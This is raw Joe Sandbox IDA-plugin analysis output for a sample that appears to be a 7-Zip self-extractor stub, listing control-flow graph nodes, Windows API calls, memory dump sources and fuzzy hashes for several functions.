                                                                control_flow_graph 822 403354-40337a lstrlenW call 4024fc 825 403385-403391 822->825 826 40337c-403380 call 40112b 822->826 828 403393-403397 825->828 829 403399-40339f 825->829 826->825 828->829 830 4033a2-4033a4 828->830 829->830 831 4033c8-4033d1 call 401986 830->831 834 4033d3-4033e6 GetSystemTimeAsFileTime GetFileAttributesW 831->834 835 4033b7-4033b9 831->835 838 4033e8-4033f6 call 40301a 834->838 839 4033ff-403408 call 401986 834->839 836 4033a6-4033ae 835->836 837 4033bb-4033bd 835->837 836->837 844 4033b0-4033b4 836->844 840 4033c3 837->840 841 403477-40347d 837->841 838->839 852 4033f8-4033fa 838->852 853 403419-40341b 839->853 854 40340a-403417 call 407776 839->854 840->831 848 4034a7-4034ba call 407776 ??3@YAXPAX@Z 841->848 849 40347f-40348a 841->849 844->837 845 4033b6 844->845 845->835 865 4034bc-4034c0 848->865 849->848 850 40348c-403490 849->850 850->848 856 403492-403497 850->856 860 40349c-4034a5 ??3@YAXPAX@Z 852->860 857 40346b-403475 ??3@YAXPAX@Z 853->857 858 40341d-40343c memcpy 853->858 854->852 856->848 862 403499-40349b 856->862 857->865 863 403451-403455 858->863 864 40343e 858->864 860->865 862->860 867 403440-403448 863->867 868 403457-403464 call 401986 863->868 866 403450 864->866 866->863 867->868 869 40344a-40344e 867->869 868->854 872 403466-403469 868->872 869->866 869->868 872->857 872->858
                                                                APIs
                                                                • lstrlenW.KERNEL32(00404AC6,?,?,00000000,?,?,?,?,00404AC6,?), ref: 00403361
                                                                • GetSystemTimeAsFileTime.KERNEL32(?,00404AC6,?,?,?,?,00404AC6,?,?,?,?,?,?,?,?,?), ref: 004033D7
                                                                • GetFileAttributesW.KERNELBASE(?,?,?,?,?,00404AC6,?,?,?,?,?,?,?,?,?,00000000), ref: 004033DE
                                                                • ??3@YAXPAX@Z.MSVCRT(?,00404AC6,?,?,?,?,00404AC6,?,?,?,?,?,?,?,?,?), ref: 0040349D
                                                                  • Part of subcall function 0040112B: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,?,00000000,00401425,00000003,?,0040502D,?,?,00000000), ref: 0040114B
                                                                  • Part of subcall function 0040112B: ??3@YAXPAX@Z.MSVCRT(?,00000000,?,00000000,00401425,00000003,?,0040502D,?,?,00000000), ref: 00401171
                                                                • memcpy.MSVCRT(-00000001,00404AC6,?,?,?,?,?,00404AC6,?), ref: 0040342F
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,00404AC6,?,?,?,?,?,?,?,?,?,00000000), ref: 0040346C
                                                                • ??3@YAXPAX@Z.MSVCRT(?,00000001,0000000C,00404AC6,00404AC6,?,?,?,?,00404AC6,?), ref: 004034B2
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.200383709084.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.200383668959.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.200383761416.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.200383795245.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.200383820089.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_Fqae7BLq4m.jbxd
                                                                Similarity
                                                                • API ID: ??3@$FileTime$??2@AttributesSystemlstrlenmemcpy
                                                                • String ID:
                                                                • API String ID: 846840743-0
                                                                • Opcode ID: 59d4a2ad1293f13bca9fbc2cc36a10c810479fd21a5ed498f46fbcb1fa619914
                                                                • Instruction ID: c1b9adc2f16cc45d244a7c0b75b8b4a4f89234fa72cd4c12ee41ca3d86f3c48f
                                                                • Opcode Fuzzy Hash: 59d4a2ad1293f13bca9fbc2cc36a10c810479fd21a5ed498f46fbcb1fa619914
                                                                • Instruction Fuzzy Hash: 8F41C836904611AADB216F998881ABF7F6CEF40716F80403BED01B61D5DB3C9B4282DD

                                                                Control-flow Graph

                                                                APIs
                                                                  • Part of subcall function 00401F47: GetUserDefaultUILanguage.KERNEL32(00404416,00000000,00000020,?), ref: 00401F51
                                                                  • Part of subcall function 00401F9D: GetLastError.KERNEL32(00000000,00000020,?), ref: 00401FEC
                                                                  • Part of subcall function 00401F9D: wsprintfW.USER32 ref: 00401FFD
                                                                  • Part of subcall function 00401F9D: GetEnvironmentVariableW.KERNEL32(?,00000000,00000000), ref: 00402012
                                                                  • Part of subcall function 00401F9D: GetLastError.KERNEL32 ref: 00402017
                                                                  • Part of subcall function 00401F9D: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 00402032
                                                                  • Part of subcall function 00401F9D: GetEnvironmentVariableW.KERNEL32(?,00000000,?), ref: 00402045
                                                                  • Part of subcall function 00401F9D: GetLastError.KERNEL32 ref: 0040204C
                                                                  • Part of subcall function 00401F9D: lstrcmpiW.KERNEL32(00000000,00000020), ref: 00402061
                                                                  • Part of subcall function 00401F9D: ??3@YAXPAX@Z.MSVCRT(00000000), ref: 00402071
                                                                  • Part of subcall function 00401F9D: SetLastError.KERNEL32(00000000), ref: 00402098
                                                                  • Part of subcall function 00401F9D: lstrlenA.KERNEL32(00413FD0), ref: 004020CC
                                                                  • Part of subcall function 00401F9D: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 004020E7
                                                                  • Part of subcall function 00401F9D: GetLocaleInfoW.KERNEL32(?,00001004,?,0000001F), ref: 00402119
                                                                  • Part of subcall function 00401F9D: ??3@YAXPAX@Z.MSVCRT(00000020), ref: 0040208F
                                                                  • Part of subcall function 00401F9D: _wtol.MSVCRT ref: 0040212A
                                                                  • Part of subcall function 00401F9D: MultiByteToWideChar.KERNEL32(00000000,00413FD0,00000001,00000000,00000002), ref: 0040214A
                                                                • SHGetSpecialFolderPathW.SHELL32(00000000,?,00000000,00000000,?,?,?,?,00000000,00000020,?), ref: 0040448C
                                                                • wsprintfW.USER32 ref: 004044A7
                                                                  • Part of subcall function 00402F6C: ??2@YAPAXI@Z.MSVCRT(00000018,00000000,004044E9,?,?,?,?,?,?,?,?,?,?,00000000,00000020,?), ref: 00402F71
                                                                • #17.COMCTL32(?,?,?,?,00000000,00000020,?), ref: 00404533
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.200383709084.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.200383668959.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.200383761416.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.200383795245.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.200383820089.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_Fqae7BLq4m.jbxd
                                                                Similarity
                                                                • API ID: ErrorLast$??2@$??3@EnvironmentVariablewsprintf$ByteCharDefaultFolderInfoLanguageLocaleMultiPathSpecialUserWide_wtollstrcmpilstrlen
                                                                • String ID: 7zSfxFolder%02d$IA
                                                                • API String ID: 3387708999-1317665167
                                                                • Opcode ID: 205a0074c49e5804c32477661e2015f4351efd6e14d5df67bf5bfd9f1882f569
                                                                • Instruction ID: c443879f351b6d6d2b07c84fde6f3777072453d7374e8d7fc75fcfd2f507d9dd
                                                                • Opcode Fuzzy Hash: 205a0074c49e5804c32477661e2015f4351efd6e14d5df67bf5bfd9f1882f569
                                                                • Instruction Fuzzy Hash: E03140B19042199BDB10FFA2DC86AEE7B78EB44308F40407FF619B21E1EB785644DB58

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 913 408ea4-408ebf call 40aef3 916 408ec1-408ecb 913->916 917 408ece-408f07 call 4065ea call 408726 913->917 922 408fd5-408ffb call 408d21 call 408b7c 917->922 923 408f0d-408f17 ??2@YAPAXI@Z 917->923 935 408ffd-409013 call 408858 922->935 936 40901e 922->936 924 408f26 923->924 925 408f19-408f24 923->925 927 408f28-408f61 call 4010e2 ??2@YAPAXI@Z 924->927 925->927 933 408f73 927->933 934 408f63-408f71 927->934 937 408f75-408fae call 4010e2 call 408726 call 40cdb8 933->937 934->937 945 409199-4091b0 935->945 946 409019-40901c 935->946 939 409020-409035 call 40e8da call 40874d 936->939 966 408fb0-408fb2 937->966 967 408fb6-408fbb 937->967 954 409037-409044 ??2@YAPAXI@Z 939->954 955 40906d-40907d 939->955 952 4091b6 945->952 953 40934c-409367 call 4087ea 945->953 946->939 957 4091b9-4091e9 952->957 975 409372-409375 953->975 976 409369-40936f 953->976 958 409046-40904d call 408c96 954->958 959 40904f 954->959 968 4090ad-4090b3 955->968 969 40907f 955->969 978 409219-40925f call 40e811 * 2 957->978 979 4091eb-4091f1 957->979 964 409051-409061 call 408726 958->964 959->964 988 409063-409066 964->988 989 409068 964->989 966->967 970 408fc3-408fcf 967->970 971 408fbd-408fbf 967->971 981 409187-409196 call 408e83 968->981 982 4090b9-4090e6 call 40d94b 968->982 977 409081-4090a7 call 40e959 call 408835 call 408931 call 408963 969->977 970->922 970->923 971->970 975->977 983 40937b-4093a2 call 40e811 975->983 976->975 977->968 1016 409261-409264 978->1016 1017 4092c9 978->1017 986 4091f7-409209 979->986 987 4092b9-4092bb 979->987 981->945 1000 409283-409288 982->1000 1001 4090ec-4090f3 982->1001 1002 4093a4-4093b8 call 408761 983->1002 1003 4093ba-4093d6 983->1003 1014 409293-409295 986->1014 1015 40920f-409211 986->1015 1004 4092bf-4092c4 987->1004 996 40906a 988->996 989->996 996->955 1012 409290 1000->1012 1013 40928a-40928c 1000->1013 1008 409121-409124 1001->1008 1009 4090f5-4090f9 1001->1009 1002->1003 1080 4093d7 call 40ce70 1003->1080 1081 4093d7 call 40f160 1003->1081 1004->977 1022 4092b2-4092b7 1008->1022 1023 40912a-409138 call 408726 1008->1023 1009->1008 1018 4090fb-4090fe 1009->1018 1012->1014 1013->1012 1025 409297-409299 1014->1025 1026 40929d-4092a0 1014->1026 1015->978 1024 409213-409215 1015->1024 1027 409267-40927f call 408761 1016->1027 1030 4092cc-4092d2 1017->1030 1028 409104-409112 call 408726 1018->1028 1029 4092a5-4092aa 1018->1029 1020 4093da-4093e4 call 40e959 1020->977 1022->987 1022->1004 1046 409145-409156 call 40cdb8 1023->1046 1047 40913a-409140 call 40d6f0 1023->1047 1024->978 1025->1026 1026->977 1050 409281 1027->1050 1028->1046 1051 409114-40911f call 40d6cb 1028->1051 1029->1004 1034 4092ac-4092ae 1029->1034 1037 4092d4-4092e0 call 408a55 1030->1037 1038 40931d-409346 call 40e959 * 2 1030->1038 1034->1022 1057 4092e2-4092ec 1037->1057 1058 4092ee-4092fa call 408aa0 1037->1058 1038->953 1038->957 1059 409158-40915a 1046->1059 1060 40915e-409163 1046->1060 1047->1046 1050->1030 1051->1046 1063 409303-40931b call 408761 1057->1063 1074 409300 1058->1074 1075 4093e9-4093fe call 40e959 * 2 1058->1075 1059->1060 1066 409165-409167 1060->1066 1067 40916b-409170 1060->1067 1063->1037 1063->1038 1066->1067 1071 409172-409174 1067->1071 1072 409178-409181 1067->1072 1071->1072 1072->981 1072->982 1074->1063 1075->977 1080->1020 1081->1020
                                                                APIs
                                                                • ??2@YAPAXI@Z.MSVCRT(00000018,?,?,00000000,?), ref: 00408F0F
                                                                • ??2@YAPAXI@Z.MSVCRT(00000028,00000000,?,?,00000000,?), ref: 00408F59
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.200383709084.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.200383668959.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.200383761416.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.200383795245.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.200383820089.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_Fqae7BLq4m.jbxd
                                                                Similarity
                                                                • API ID: ??2@
                                                                • String ID: IA$IA
                                                                • API String ID: 1033339047-1400641299
                                                                • Opcode ID: 6a22e71803ea0f4d69e2f58a84b042c4ce0c016d1f42beed39b79896576e25f5
                                                                • Instruction ID: ddcf9de22f7a46eeefc4975c1fab543939f34ce9f972055b0c78c556d294e1f5
                                                                • Opcode Fuzzy Hash: 6a22e71803ea0f4d69e2f58a84b042c4ce0c016d1f42beed39b79896576e25f5
                                                                • Instruction Fuzzy Hash: EF123671A00209DFCB14EFA5C98489ABBB5FF48304B10456EF95AA7392DB39ED85CF44

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 1095 410cd0-410d1a call 410b9a free 1098 410d22-410d23 1095->1098 1099 410d1c-410d1e 1095->1099 1099->1098
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.200383709084.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.200383668959.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.200383761416.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.200383795245.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.200383820089.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_Fqae7BLq4m.jbxd
                                                                Similarity
                                                                • API ID: free
                                                                • String ID: $KA$4KA$HKA$\KA
                                                                • API String ID: 1294909896-3316857779
                                                                • Opcode ID: 376fb7dfafd84c32bde4dd83858b4f8e2c6f0d8f0efa40633e7013e4dd95691d
                                                                • Instruction ID: 889df95fe732b3a4b2d84b4ab476e7a54c7f97cead7299b76f73e2708a1c6c0a
                                                                • Opcode Fuzzy Hash: 376fb7dfafd84c32bde4dd83858b4f8e2c6f0d8f0efa40633e7013e4dd95691d
                                                                • Instruction Fuzzy Hash: C5F09271409B109FC7319F55E405AC6B7F4AE447183058A2EA89A5BA11D3B8F989CB9C

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 1100 4096c7-40970f _EH_prolog call 4010e2 1103 409711-409714 1100->1103 1104 409717-40971a 1100->1104 1103->1104 1105 409730-409755 1104->1105 1106 40971c-409721 1104->1106 1109 409757-40975d 1105->1109 1107 409723-409725 1106->1107 1108 409729-40972b 1106->1108 1107->1108 1110 409b93-409ba4 1108->1110 1111 409763-409767 1109->1111 1112 409827-40983a call 40118a 1109->1112 1113 409769-40976c 1111->1113 1114 40976f-40977e 1111->1114 1121 409851-409876 call 408e4e ??2@YAPAXI@Z 1112->1121 1122 40983c-409846 call 409425 1112->1122 1113->1114 1115 409780-409796 call 4094e0 call 40969d call 40e959 1114->1115 1116 4097a3-4097a8 1114->1116 1137 40979b-4097a1 1115->1137 1119 4097b6-4097f0 call 4094e0 call 40969d call 40e959 call 4095b7 1116->1119 1120 4097aa-4097b4 1116->1120 1125 4097f3-409809 1119->1125 1120->1119 1120->1125 1133 409881-40989a call 4010e2 call 40eb24 1121->1133 1134 409878-40987f call 40ebf7 1121->1134 1144 40984a-40984c 1122->1144 1130 40980c-409814 1125->1130 1136 409816-409825 call 409403 1130->1136 1130->1137 1154 40989d-4098c0 call 40eb19 1133->1154 1134->1133 1136->1130 1137->1109 1144->1110 1157 4098c2-4098c7 1154->1157 1158 4098f6-4098f9 1154->1158 1161 4098c9-4098cb 1157->1161 1162 4098cf-4098e7 call 409530 call 409425 1157->1162 1159 409925-409949 ??2@YAPAXI@Z 1158->1159 1160 4098fb-409900 1158->1160 1164 409954 1159->1164 1165 40994b-409952 call 409c13 1159->1165 1166 409902-409904 1160->1166 1167 409908-40991e call 409530 call 409425 1160->1167 1161->1162 1180 4098e9-4098eb 1162->1180 1181 4098ef-4098f1 1162->1181 1170 409956-40996d call 4010e2 1164->1170 1165->1170 1166->1167 1167->1159 1182 40997b-4099a0 call 409fb4 1170->1182 1183 40996f-409978 1170->1183 1180->1181 1181->1110 1186 4099a2-4099a7 1182->1186 1187 4099e3-4099e6 1182->1187 1183->1182 1190 4099a9-4099ab 1186->1190 1191 4099af-4099b4 1186->1191 1188 4099ec-409a49 call 409603 call 4094b1 call 408ea4 1187->1188 1189 409b4e-409b53 1187->1189 1205 409a4e-409a53 1188->1205 1194 409b55-409b56 1189->1194 1195 409b5b-409b7f 1189->1195 1190->1191 1192 4099b6-4099b8 1191->1192 1193 4099bc-4099d4 call 409530 call 409425 1191->1193 1192->1193 1206 4099d6-4099d8 1193->1206 1207 4099dc-4099de 1193->1207 1194->1195 1195->1154 1208 409ab5-409abb 1205->1208 1209 409a55 1205->1209 1206->1207 1207->1110 1211 409ac1-409ac3 1208->1211 1212 409abd-409abf 1208->1212 1210 409a57 1209->1210 1213 409a5a-409a63 call 409f49 1210->1213 1214 409a65-409a67 1211->1214 1215 409ac5-409ad1 1211->1215 1212->1210 1213->1214 1226 409aa2-409aa4 1213->1226 1217 409a69-409a6a 1214->1217 1218 409a6f-409a71 1214->1218 1219 409ad3-409ad5 1215->1219 1220 409ad7-409add 1215->1220 1217->1218 1223 409a73-409a75 1218->1223 1224 409a79-409a91 call 409530 call 409425 1218->1224 1219->1213 1220->1195 1221 409adf-409ae5 1220->1221 1221->1195 1223->1224 1224->1144 1233 409a97-409a9d 1224->1233 1229 409aa6-409aa8 1226->1229 1230 409aac-409ab0 1226->1230 1229->1230 1230->1195 1233->1144
                                                                APIs
                                                                • _EH_prolog.MSVCRT ref: 004096D0
                                                                • ??2@YAPAXI@Z.MSVCRT(00000038,00000001), ref: 0040986E
                                                                • ??2@YAPAXI@Z.MSVCRT(00000038,?,00000000,00000000,00000001), ref: 00409941
                                                                  • Part of subcall function 00409C13: ??2@YAPAXI@Z.MSVCRT(00000020,?,00000000,?,00409952,?,00000000,00000000,00000001), ref: 00409C3B
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.200383709084.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.200383668959.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.200383761416.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.200383795245.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.200383820089.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_Fqae7BLq4m.jbxd
                                                                Similarity
                                                                • API ID: ??2@$H_prolog
                                                                • String ID: HIA
                                                                • API String ID: 3431946709-2712174624
                                                                • Opcode ID: 3a91edc2a80342029bdf13785710b8021a7be55c7c109f54d8d38dfd795fbdbc
                                                                • Instruction ID: da3614a8b55b1d80bdf53177d95d0cff5abf3d9c279f99a440b99522f39c568d
                                                                • Opcode Fuzzy Hash: 3a91edc2a80342029bdf13785710b8021a7be55c7c109f54d8d38dfd795fbdbc
                                                                • Instruction Fuzzy Hash: 53F13971610249DFCB24DF69C884AAA77F4BF48314F24416AF829AB392DB39ED41CF54

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 1236 402844-40288e call 411c20 call 40dcfb lstrlenA * 2 1240 402893-4028af call 40dcc7 1236->1240 1242 4028b5-4028ba 1240->1242 1243 40297f 1240->1243 1242->1243 1244 4028c0-4028ca 1242->1244 1245 402981-402985 1243->1245 1246 4028cd-4028d2 1244->1246 1247 402911-402916 1246->1247 1248 4028d4-4028d9 1246->1248 1249 40293b-40295f memmove 1247->1249 1251 402918-40292b memcmp 1247->1251 1248->1249 1250 4028db-4028ee memcmp 1248->1250 1256 402961-402968 1249->1256 1257 40296e-402979 1249->1257 1252 4028f4-4028fe 1250->1252 1253 40297b-40297d 1250->1253 1254 40290b-40290f 1251->1254 1255 40292d-402939 1251->1255 1252->1243 1258 402900-402906 call 402640 1252->1258 1253->1245 1254->1246 1255->1246 1256->1257 1259 402890 1256->1259 1257->1245 1258->1254 1259->1240
                                                                APIs
                                                                • lstrlenA.KERNEL32(?,?,00000000), ref: 00402876
                                                                • lstrlenA.KERNEL32(?,?,00000000), ref: 0040287E
                                                                • memcmp.MSVCRT(?,?,?), ref: 004028E4
                                                                • memcmp.MSVCRT(?,?,?,?,00000000), ref: 00402921
                                                                • memmove.MSVCRT(?,?,00000000,?,00000000), ref: 00402953
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.200383709084.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.200383668959.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.200383761416.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.200383795245.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.200383820089.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_Fqae7BLq4m.jbxd
                                                                Similarity
                                                                • API ID: lstrlenmemcmp$memmove
                                                                • String ID:
                                                                • API String ID: 3251180759-0
                                                                • Opcode ID: 67daa449d30d113f3b3b6daec82bd49862eba03341b4cd8aae73257779b8cae6
                                                                • Instruction ID: d4955105e7b234ce255a009ef61331e6eb412850de833d0a73495bfba1f32545
                                                                • Opcode Fuzzy Hash: 67daa449d30d113f3b3b6daec82bd49862eba03341b4cd8aae73257779b8cae6
                                                                • Instruction Fuzzy Hash: 4A417F72E00209AFCF01DFA4C9889EEBBB5EF08344F04447AE945B3291D3B49E55CB55

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 1263 40150b-401561 call 408726 call 401329 call 401429 CreateThread 1270 401563 call 40786b 1263->1270 1271 401568-401583 WaitForSingleObject 1263->1271 1270->1271 1273 401585-401588 1271->1273 1274 4015b7-4015bd 1271->1274 1277 40158a-40158d 1273->1277 1278 4015ab 1273->1278 1275 40161b 1274->1275 1276 4015bf-4015d4 GetExitCodeThread 1274->1276 1280 401620-401623 1275->1280 1281 4015d6-4015d8 1276->1281 1282 4015de-4015e9 1276->1282 1283 4015a7-4015a9 1277->1283 1284 40158f-401592 1277->1284 1279 4015ad-4015b5 call 407776 1278->1279 1279->1275 1281->1282 1286 4015da-4015dc 1281->1286 1287 4015f1-4015fa 1282->1287 1288 4015eb-4015ec 1282->1288 1283->1279 1289 4015a3-4015a5 1284->1289 1290 401594-401597 1284->1290 1286->1280 1293 401605-401611 SetLastError 1287->1293 1294 4015fc-401603 1287->1294 1292 4015ee-4015ef 1288->1292 1289->1279 1295 401599-40159c 1290->1295 1296 40159e-4015a1 1290->1296 1297 401613-401618 call 407776 1292->1297 1293->1297 1294->1275 1294->1293 1295->1275 1295->1296 1296->1292 1297->1275
                                                                APIs
                                                                • CreateThread.KERNELBASE(00000000,00000000,0040129C,00000000,00000000,?), ref: 0040154F
                                                                • WaitForSingleObject.KERNEL32(000000FF,?,00404AFB,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00401570
                                                                  • Part of subcall function 00407776: wvsprintfW.USER32(?,00000000,?), ref: 0040779A
                                                                  • Part of subcall function 00407776: GetLastError.KERNEL32(?,00000000,0000FDE9), ref: 004077AB
                                                                  • Part of subcall function 00407776: FormatMessageW.KERNEL32(00001100,00000000,00000000,00402A50,00402A50,00000000,00000000,?,00000000,0000FDE9), ref: 004077D3
                                                                  • Part of subcall function 00407776: FormatMessageW.KERNEL32(00001100,00000000,00402A50,00000000,00402A50,00000000,00000000,?,00000000,0000FDE9), ref: 004077E8
                                                                  • Part of subcall function 00407776: lstrlenW.KERNEL32(?,?,00000000,0000FDE9), ref: 004077FB
                                                                  • Part of subcall function 00407776: lstrlenW.KERNEL32(00402A50,?,00000000,0000FDE9), ref: 00407802
                                                                  • Part of subcall function 00407776: ??2@YAPAXI@Z.MSVCRT(00000000,?,00000000,0000FDE9), ref: 00407817
                                                                  • Part of subcall function 00407776: lstrcpyW.KERNEL32(00000000,?,?,00000000,0000FDE9), ref: 0040782D
                                                                  • Part of subcall function 00407776: lstrcpyW.KERNEL32(-00000002,00402A50,?,00000000,0000FDE9), ref: 0040783E
                                                                  • Part of subcall function 00407776: ??3@YAXPAX@Z.MSVCRT(00000000,00000000,?,00000000,0000FDE9), ref: 00407847
                                                                  • Part of subcall function 00407776: LocalFree.KERNEL32(00402A50,?,00000000,0000FDE9), ref: 00407851
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.200383709084.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.200383668959.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.200383761416.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.200383795245.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.200383820089.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_Fqae7BLq4m.jbxd
                                                                Similarity
                                                                • API ID: FormatMessagelstrcpylstrlen$??2@??3@CreateErrorFreeLastLocalObjectSingleThreadWaitwvsprintf
                                                                • String ID:
                                                                • API String ID: 359084233-0
                                                                • Opcode ID: bfd7be960afb110040db1d822841385e4bb8395790a59903d21b295a7462948d
                                                                • Instruction ID: 87277f5b9ffc23463226fd0df2644328d4cfb3d5af9d6e9341eee715f5e270ad
                                                                • Opcode Fuzzy Hash: bfd7be960afb110040db1d822841385e4bb8395790a59903d21b295a7462948d
                                                                • Instruction Fuzzy Hash: 8231F171644200BBDA305B15DC86EBB37B9EBC5350F24843BF522F92F0CA79A941DA5E

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 1300 401986-401995 CreateDirectoryW 1301 4019c7-4019cb 1300->1301 1302 401997-4019a4 GetLastError 1300->1302 1303 4019b1-4019be GetFileAttributesW 1302->1303 1304 4019a6 1302->1304 1303->1301 1306 4019c0-4019c2 1303->1306 1305 4019a7-4019b0 SetLastError 1304->1305 1306->1301 1307 4019c4-4019c5 1306->1307 1307->1305
                                                                APIs
                                                                • CreateDirectoryW.KERNELBASE(004033CE,00000000,-00000001,004033CE,?,00404AC6,?,?,?,?,00404AC6,?), ref: 0040198D
                                                                • GetLastError.KERNEL32(?,?,?,?,00404AC6,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00401997
                                                                • SetLastError.KERNEL32(000000B7,?,?,?,?,00404AC6,?,?,?,?,?,?,?,?,?,00000000), ref: 004019A7
                                                                • GetFileAttributesW.KERNELBASE(?,?,?,?,?,00404AC6,?,?,?,?,?,?,?,?,?,00000000), ref: 004019B5
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.200383709084.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.200383668959.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.200383761416.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.200383795245.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.200383820089.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_Fqae7BLq4m.jbxd
                                                                Similarity
                                                                • API ID: ErrorLast$AttributesCreateDirectoryFile
                                                                • String ID:
                                                                • API String ID: 635176117-0
                                                                • Opcode ID: 393c5bca226d6deeec728b25f224b431065b6bfcdefbc0a9fd36f7f362ffe78b
                                                                • Instruction ID: 5ae0be16486f509c6b40768ba71a6c1c2cea9be4331c5fc90c1b41dbeb0419e3
                                                                • Opcode Fuzzy Hash: 393c5bca226d6deeec728b25f224b431065b6bfcdefbc0a9fd36f7f362ffe78b
                                                                • Instruction Fuzzy Hash: D5E09AB0518250AFDE142BB4BD187DB3AA5AF46362F508932F495E02F0C33888428A89

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
